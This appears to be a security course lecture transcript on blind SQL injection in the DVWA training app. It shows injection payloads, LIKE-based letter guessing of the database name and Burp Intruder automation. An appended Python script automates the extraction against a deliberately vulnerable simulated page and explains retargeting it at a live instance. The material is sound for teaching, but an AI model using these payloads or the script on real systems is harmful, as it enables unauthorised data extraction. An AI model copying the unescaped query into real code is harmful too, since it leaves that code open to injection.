1
00:00:01,010 --> 00:00:07,700
OK, it's time we cover blind SQL injection. So we already know what SQL injection is.

2
00:00:07,880 --> 00:00:10,910
We know how it works and we know how we can exploit it.

3
00:00:11,390 --> 00:00:14,060
But what is blind SQL injection?

4
00:00:14,750 --> 00:00:21,740
Well, let me show you. Let's navigate to our DVWA and log in to our page.

5
00:00:24,620 --> 00:00:32,119
Navigate to Blind SQL Injection, and if you remember, how we actually managed to discover whether

6
00:00:32,119 --> 00:00:39,410
an SQL injection was present on an application or not is we used a single quote, and once we entered

7
00:00:39,410 --> 00:00:44,420
that single quote, it would give us an error, or it would give us some error message, or possibly even

8
00:00:44,420 --> 00:00:47,450
the query itself where the error occurs.

9
00:00:48,050 --> 00:00:52,440
That's how we would know that this input is not really getting filtered.

10
00:00:52,490 --> 00:00:56,390
Well, if I click submit on Blind SQL Injection...

11
00:00:59,510 --> 00:01:07,340
nothing happens. It's as if this application is not vulnerable. It doesn't give any error. We can type

12
00:01:07,340 --> 00:01:13,490
anything with as many single quotes as we want and nothing will happen.

13
00:01:13,760 --> 00:01:19,850
Any character that we input will just get processed by the application and it will retrieve the same

14
00:01:19,850 --> 00:01:21,030
page back to us.

15
00:01:21,890 --> 00:01:24,920
So does that mean that it's not vulnerable?

16
00:01:25,490 --> 00:01:31,010
Well, it could be that there is also blind SQL injection, which means it's not giving us

17
00:01:31,010 --> 00:01:34,550
any error back, but it's still vulnerable to SQL injection.

18
00:01:35,480 --> 00:01:42,890
OK, but how can we figure out whether SQL injection is present in this application?

19
00:01:43,580 --> 00:01:46,320
Well, let's try specifying the correct input first.

20
00:01:46,330 --> 00:01:54,890
So if I just type 1 and click on submit, it will give me an ID of 1 and it will give me its first

21
00:01:54,890 --> 00:01:56,390
name and last name.

22
00:01:56,420 --> 00:02:03,470
If I type, for example, 2, it will give Gordon Brown, and so on and so on, so we can select one user

23
00:02:03,470 --> 00:02:06,410
ID right here and we get one output back.

24
00:02:07,390 --> 00:02:16,750
Same goes if we, for example, try 1' OR 1=1, or 1=2. Let's try

25
00:02:16,750 --> 00:02:20,740
it like that, so we don't get admin back.

26
00:02:20,920 --> 00:02:23,020
But it could be due to two reasons.

27
00:02:24,010 --> 00:02:28,270
Reason number one, it's not vulnerable to injection, or reason

28
00:02:28,270 --> 00:02:35,890
number two, only this argument is satisfied, since ID 1 exists, but 1 is not equal to 2.

29
00:02:36,130 --> 00:02:38,070
So this part is not satisfied.

30
00:02:38,080 --> 00:02:40,900
Therefore we only get the output for admin.

31
00:02:42,020 --> 00:02:53,360
But if we were to type 1' OR '1'='1 and press enter...

32
00:02:56,120 --> 00:02:59,220
we get all the users from the application.

33
00:02:59,630 --> 00:03:02,600
Now, we don't get their usernames, passwords.

34
00:03:02,630 --> 00:03:06,260
However, we do get all of them output right here.

35
00:03:06,560 --> 00:03:12,360
And this would be a good indication that there is a possible SQL injection in the application.

36
00:03:13,160 --> 00:03:13,590
Why?

37
00:03:14,090 --> 00:03:18,290
Well, because this application is not meant to output 20 users.

38
00:03:18,290 --> 00:03:19,580
It's only meant to output one.

39
00:03:20,030 --> 00:03:28,370
And with this statement, we told the application we want the ID number 1, or if 1 equals 1,

40
00:03:28,910 --> 00:03:35,690
and it gave us all the other IDs. And that is one of the ways we can discover whether it has some vulnerabilities

41
00:03:35,690 --> 00:03:36,470
in the application.

42
00:03:37,070 --> 00:03:38,840
Now, how can you exploit this?

43
00:03:39,230 --> 00:03:41,180
Well, here is where the problem occurs.

44
00:03:41,420 --> 00:03:48,910
Exploiting blind SQL injection is much, much longer and harder than exploiting an error-based SQL

45
00:03:48,920 --> 00:03:49,460
injection.

46
00:03:50,470 --> 00:03:55,930
For example, here, we can't really output the database name.

47
00:03:56,140 --> 00:04:01,390
We need to guess, because we're not getting any output back or any error back.

48
00:04:02,780 --> 00:04:10,300
So how can we go about getting the database name, the table name, the column name and all of that?

49
00:04:11,120 --> 00:04:14,370
First of all, to keep in mind is that it takes a lot of time to do that.

50
00:04:14,390 --> 00:04:19,670
So for the purposes of this course, we will only show how we can get the database.

51
00:04:21,529 --> 00:04:31,670
To access the database we can use an SQL LIKE operator, and you can find it on this page, which describes

52
00:04:31,670 --> 00:04:33,260
what exactly it does.

53
00:04:33,720 --> 00:04:40,940
The LIKE operator is used in a WHERE clause to search for a specified pattern in a column. Since

54
00:04:40,940 --> 00:04:46,760
we don't really know how the database is called, or we do actually know how it's called, but only because

55
00:04:46,760 --> 00:04:49,140
we exploited it in the previous lecture.

56
00:04:49,160 --> 00:04:51,170
We know that the database name is dvwa.

57
00:04:52,160 --> 00:04:53,510
This is the name of the database.

58
00:04:53,720 --> 00:04:55,880
But let's pretend that we don't know it.

59
00:04:55,940 --> 00:04:59,740
We want to discover it by exploiting blind SQL injection.

60
00:05:00,690 --> 00:05:07,920
We could do it like this. We could type 1' for the ID, AND database(), since we know MySQL

61
00:05:07,920 --> 00:05:17,670
has this database() function, and then this LIKE operator, which has a syntax of open quote, then the letter

62
00:05:17,670 --> 00:05:22,330
that you want to use, let's go with letter A, and then the percent sign.

63
00:05:23,070 --> 00:05:24,090
What does this mean?

64
00:05:24,480 --> 00:05:31,890
Well, this line simply says that we're checking whether the database name starts with A, and this percent

65
00:05:31,900 --> 00:05:35,860
sign simply replaces all the other characters that could come after.

66
00:05:36,150 --> 00:05:41,730
So we're only checking whether the first letter of the database is A. Let's press enter.

67
00:05:43,600 --> 00:05:44,810
We get nothing back.

68
00:05:45,160 --> 00:05:45,820
Why is that?

69
00:05:46,630 --> 00:05:52,570
Well, it's because the first letter of the database is not A, therefore it didn't give us any output back.

70
00:05:53,230 --> 00:06:03,430
If we were to type something like this, AND database(), and then we switch A with D, because our database

71
00:06:03,430 --> 00:06:05,850
does start with D, and then click submit,

72
00:06:06,340 --> 00:06:12,510
now we get output back, and now we would know that the database name starts with letter D.

73
00:06:13,390 --> 00:06:20,990
As you can only imagine, this can take a lot of time to guess, and we could use the help of Burp Suite

74
00:06:21,100 --> 00:06:21,640
to do this.

75
00:06:22,000 --> 00:06:23,310
So let's go to Burp Suite.

76
00:06:24,160 --> 00:06:25,980
Let's turn on the intercept.

77
00:06:25,990 --> 00:06:26,770
Let's type...

78
00:06:28,160 --> 00:06:38,120
1, and perhaps we just type it in first and then I'm going to intercept. So 1' AND database() LIKE

79
00:06:39,130 --> 00:06:39,420
'a.

80
00:06:40,860 --> 00:06:48,210
Let's start with A once again, just for the purposes of showing how this would work, and then we intercept

81
00:06:48,210 --> 00:06:48,780
the request.

82
00:06:49,970 --> 00:06:53,450
Now we want to send this request to Intruder.

83
00:06:54,920 --> 00:06:59,330
Now we can turn off the intercept and go back to Intruder.

84
00:07:00,380 --> 00:07:07,200
We want to select the positions, and here we want to clear all of these positions, find the letter A,

85
00:07:07,370 --> 00:07:14,330
which is right here, and then add a position to it, since that is the only thing that we want to use

86
00:07:14,330 --> 00:07:15,170
as our payload.

87
00:07:16,310 --> 00:07:21,660
Once we do that, we want to go to Payloads, and here we want to load all of the letters possible, so

88
00:07:21,670 --> 00:07:31,610
we'll just go A, B, C, D, E, F, G, and here I loaded all of the possible letters that could be

89
00:07:31,610 --> 00:07:33,350
the first letter of the database.

90
00:07:34,040 --> 00:07:39,800
So once we have all the letters, we want to go to Options.

91
00:07:40,580 --> 00:07:43,910
And here in the Grep - Match, we can clear everything.

92
00:07:45,830 --> 00:07:54,740
And add, for example, admin. So if we find the word admin in the page, then we're going to assume that

93
00:07:55,070 --> 00:07:56,360
we found the correct letter.

94
00:07:56,780 --> 00:07:57,470
Why is that?

95
00:07:57,740 --> 00:08:04,580
Well, if we get the correct output, it will output this, that has admin right here.

96
00:08:05,150 --> 00:08:10,280
Or, matter of fact, just so we can get an even clearer response, let's copy this and paste the string, which

97
00:08:10,280 --> 00:08:14,750
is "First name: admin", and let's paste it right here.

98
00:08:17,290 --> 00:08:25,510
Then we add it right here, and if our response finds this string inside of the code, that means we

99
00:08:25,510 --> 00:08:26,520
found the correct letter.

100
00:08:27,310 --> 00:08:29,920
All we need to do right now is start the attack.

101
00:08:33,470 --> 00:08:41,390
And here it is. We already get our response: letter D is checked, it has "First name: admin" in the

102
00:08:41,530 --> 00:08:42,380
response.

103
00:08:42,740 --> 00:08:49,010
It also has a different length of the response than all the other letters, as we can see right here.

104
00:08:49,580 --> 00:08:53,180
Now that we guessed the first letter, we would cancel this.

105
00:08:53,600 --> 00:09:02,300
We would go back to the Positions and we would, first of all, clear this, remove the A and type D.

106
00:09:02,810 --> 00:09:05,740
After typing D, we once again type A.

107
00:09:06,230 --> 00:09:13,670
Then we select A once again as the second letter, since we already guessed the first, and now our command

108
00:09:13,670 --> 00:09:14,840
looks something like this:

109
00:09:16,460 --> 00:09:18,680
1' AND database()

110
00:09:21,980 --> 00:09:28,550
LIKE 'da%. Now we're guessing the second letter.

111
00:09:29,330 --> 00:09:35,730
OK, if I submit this, it once again does not give anything back, because A is not the second letter.

112
00:09:36,140 --> 00:09:38,980
So let's see which letter is the second one.

113
00:09:39,530 --> 00:09:40,850
We can start the attack.

114
00:09:42,400 --> 00:09:44,170
Let's wait for this to finish.

115
00:09:45,470 --> 00:09:49,670
And here it is, letter V is the second letter.

116
00:09:50,710 --> 00:09:53,290
Now we can go on to the third letter.

117
00:09:56,650 --> 00:10:01,450
So dv, A, we once again selected.

118
00:10:02,830 --> 00:10:03,900
We started the attack.

119
00:10:06,780 --> 00:10:12,150
And here it is. It appears that W is the next, or third, letter.

120
00:10:12,960 --> 00:10:14,610
Let's add it right here.

121
00:10:17,650 --> 00:10:23,080
And let's add A at the end, select A and run the attack once again.

122
00:10:25,230 --> 00:10:32,450
And we get the response straight away: A is the fourth letter. Now we got the full name of the database.

123
00:10:32,730 --> 00:10:39,480
Now if we try to type like this, AND database() LIKE

124
00:10:41,250 --> 00:10:42,390
'dvwa',

125
00:10:45,450 --> 00:10:52,740
submit, now we get the response back, and here we can see that this is the name of our database, and

126
00:10:52,740 --> 00:10:57,280
you will have to do this for every database name, table name and all of that.

127
00:10:58,080 --> 00:11:02,860
So now you notice why this is much longer to perform and much harder.

128
00:11:03,300 --> 00:11:05,000
Nonetheless, we covered it.

129
00:11:05,010 --> 00:11:06,240
We know how it works.

130
00:11:06,510 --> 00:11:13,200
We know that if we don't get any error once we specify the input, it doesn't mean that there is no SQL

131
00:11:13,200 --> 00:11:13,690
injection.

132
00:11:14,550 --> 00:11:20,700
We can also try something like making the application sleep for three seconds, which is also an indication

133
00:11:20,700 --> 00:11:27,000
that there could be an actual injection, if the application does sleep for three seconds after our command.

134
00:11:27,840 --> 00:11:28,600
Nonetheless,

135
00:11:29,130 --> 00:11:30,540
thank you for watching this lecture.

136
00:11:30,540 --> 00:11:37,530
And in the next video, we're going to start off with XML XPath injection.
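Added example, not part of the lecture: the letter-by-letter LIKE guessing that the lecture drives by hand through Burp Intruder, automated in Python. Nothing here is DVWA's or the course's code. Because no DVWA/MySQL instance is available offline, the script carries a constructed stand-in for the vulnerable page (an in-memory SQLite database whose query concatenates the id parameter unescaped, like DVWA's `WHERE user_id = '$id'`), and since SQLite has no `database()` function it recovers a table name from `sqlite_master` instead; the expression to recover is a parameter, so against real MySQL you would pass `database()`. The boolean oracle is the same "First name: admin" grep-match string the lecture uses, and the request counter shows why the lecture calls this slow.

```python
import sqlite3
import string

# Constructed stand-in for DVWA's "Blind SQL Injection" page (assumption: the
# real page is backed by MySQL; this one uses SQLite so the example runs offline).
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT);
INSERT INTO users VALUES
    (1, 'admin', 'admin'), (2, 'Gordon', 'Brown'), (3, 'Hack', 'Me'),
    (4, 'Pablo', 'Picasso'), (5, 'Bob', 'Smith');
""")


def vulnerable_page(user_id: str) -> str:
    """Simulated server side for ?id=<user_id>. The id is concatenated into
    the query unescaped: that is the injection being exploited, kept on purpose."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        rows = _conn.execute(query).fetchall()
    except sqlite3.Error:
        # Blind behaviour: SQL errors are swallowed and the page just comes back empty.
        return ""
    return "".join(
        f"<pre>ID: {user_id}<br>First name: {first}<br>Surname: {last}</pre>"
        for first, last in rows
    )


def oracle(payload: str) -> bool:
    """True/false oracle: does the response contain the grep-match string?"""
    return "First name: admin" in vulnerable_page(payload)


def extract_with_like(target_expr: str,
                      alphabet: str = string.ascii_lowercase + string.digits,
                      max_len: int = 64):
    """Recover the string value of target_expr one character at a time with
    payloads of the form  1' AND <expr> LIKE 'prefix%  (closing quote supplied
    by the application). Returns (recovered_value, requests_sent).

    Caveats a practitioner should know:
      * LIKE is case-insensitive under MySQL's default collations and for ASCII
        in SQLite, so the recovered value is lowercase; use BINARY / substr()
        comparisons if exact case matters.
      * '%' and '_' are LIKE wildcards and are deliberately absent from the
        alphabet; add them only with an ESCAPE clause.
    """
    known, requests = "", 0
    while len(known) < max_len:
        # Termination check: an exact LIKE (no trailing %) proves we have it all,
        # the same final check the lecture does with  database() LIKE 'dvwa'.
        if known:
            requests += 1
            if oracle(f"1' AND {target_expr} LIKE '{known}"):
                return known, requests
        for ch in alphabet:
            requests += 1
            if oracle(f"1' AND {target_expr} LIKE '{known + ch}%"):
                known += ch
                break
        else:
            raise ValueError(f"no character in alphabet matched after {known!r}")
    return known, requests


if __name__ == "__main__":
    # Stand-in for MySQL's database(): first table name in the SQLite catalogue.
    target = "(SELECT name FROM sqlite_master WHERE type='table')"
    value, n = extract_with_like(target)
    print(f"recovered {value!r} in {n} requests")
```

To point this at a real DVWA instance, replace `vulnerable_page` with an HTTP GET of the `?id=` parameter sent with the logged-in session cookie, and pass `database()` as `target_expr`; the guessing loop and oracle stay the same. The request count is linear in alphabet size times name length, which is the cost the lecture is warning about; a binary search on `ASCII(SUBSTRING(expr, pos, 1))` cuts it to a handful of requests per character, but that is a different comparison than the LIKE technique shown here.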